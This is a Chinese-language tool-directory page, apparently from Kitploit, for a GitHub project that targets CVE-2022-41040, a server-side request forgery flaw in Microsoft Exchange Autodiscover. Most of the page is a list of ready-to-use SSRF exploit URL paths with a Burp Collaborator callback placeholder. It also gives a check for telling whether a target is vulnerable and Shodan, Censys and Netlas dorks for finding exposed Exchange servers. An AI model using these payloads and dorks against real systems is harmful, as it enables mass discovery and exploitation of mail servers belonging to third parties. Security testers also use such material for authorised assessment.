Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-41040 — SSRF 利用载荷和侦察 dorks,针对 CVE-2022-41040 的 Microsoft Exchange Autodiscover 端点,集成 Burp Collaborator。 | Kitploit
工具/GitHubGitHub/itpatjidr/cve-2022-41040
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubitpatjidr/cve-2022-41040

CVE-2022-41040

SSRF 利用载荷和侦察 dorks,针对 CVE-2022-41040 的 Microsoft Exchange Autodiscover 端点,集成 Burp Collaborator。

查看仓库
1233年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-41040

Microsoft Exchange 存在服务端请求伪造漏洞

Payload :

  • /autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL
  • /autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
  • /autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
  • /autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
  • /autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
  • /autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
  • /autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
  • /autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
  • /autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
  • /autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell

将 COLLABHERE 替换为 Burp Collaborator

如果存在漏洞,状态码必须为 404,且响应中必须包含 IIS Web Core

Dork 列表

  • http.favicon.hash:1768726119 (Shodan)
  • http.component:"outlook web app" (Shodan)
  • http.component:"outlook web app" ssl:"hybrid" (Shodan)
  • tag.name:"microsoft_exchange" prot7:http http.status_code:200 (Netlas.io)
  • same_service(http://services.http.response.favicons.name: /owa/auth/ and services.http.response.html_title={"Outlook Web App", "Outlook"}) (Censys)
下载工具